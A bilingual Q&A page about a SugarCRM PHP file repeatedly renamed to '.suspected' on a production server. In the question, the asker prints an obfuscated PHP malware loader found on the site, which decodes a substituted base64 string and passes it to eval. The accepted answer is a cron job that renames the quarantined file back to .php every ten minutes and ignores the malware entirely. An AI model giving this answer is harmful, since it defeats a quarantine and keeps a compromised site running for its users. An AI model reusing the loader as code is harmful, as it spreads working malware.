php文件自动重命名为php.suspected [英] php file automatically renamed to php.suspected

问题描述

从最近4天开始，我们在生产服务器(AWS EC2实例)上遇到一个奇怪的问题，该服务器仅针对一个站点，即SugarCRM.

Since last 4 days, we are facing strange issue on our Production server (AWS EC2 instance) specific to only one site which is SugarCRM.

问题为/home/site_folder/public_html/include/MassUpdate.php 文件自动重命名为/home/site_folder/public_html/include/MassUpdate.php.suspected

Issue is /home/site_folder/public_html/include/MassUpdate.php file is renamed automatically to /home/site_folder/public_html/include/MassUpdate.php.suspected

每天发生2-3次，间隔3-4小时.仅在特定站点的情况下才会发生此问题，即使在暂存同一站点的副本时也不会发生.我什至从两个站点检查了该文件的代码，都一样.

This happens 2-3 times in a day with 3-4 hours of gap. This issue occurs only in case of specific site, even it doesn't occur for staging replica of the same site. I even checked code of that file from both sites, it's same.

我们已经Google搜索并发现，此类问题主要发生在Wordpress网站上，可能是由于受到攻击所致.但是我们检查了服务器是否受到了攻击，没有任何攻击.此外，服务器上也没有运行病毒/恶意软件扫描.

We have Googled and found, such issue occurs mostly for Wordpress sites and it could be because of attack. But we checked our server against the attack, there isn't any. Also there is no virus/malware scan running on server.

我们该怎么办?

更新: 通过此链接，我们发现了一些东西. 我们执行了egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/，发现带有以下示例代码的文件很少.

Update: We found few things after going through this link We executed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ And found that there are few files with following sample code.

    <?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>

似乎有些恶意软件，我们如何将其永久删除?

Seems some malware, how we go about removing it permanently?

谢谢

推荐答案

发布此答案，可能会对其他人有所帮助.

Posting this answer, it may help others.

1. 在方便的位置创建扩展名为'.sh'的文件.
2. 在其中添加以下代码.

1. Create a file with '.sh' extension at your convenient location.
2. Add following code in it.

#Rename your_file_name.php.suspected to your_file_name.php mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php

#Rename your_file_name.php.suspected to your_file_name.php mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php

1. 保存此文件.
2. 使用crontab中的以下行，每10分钟(或您需要的间隔)设置cron

*/10 * * * * path_to_cron_file.sh

1. 重新启动crontab服务.

您将获得有关在Google上创建cron的大量文档.

You will get lot of documentation on creating cron on Google.

这篇关于php文件自动重命名为php.suspected的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！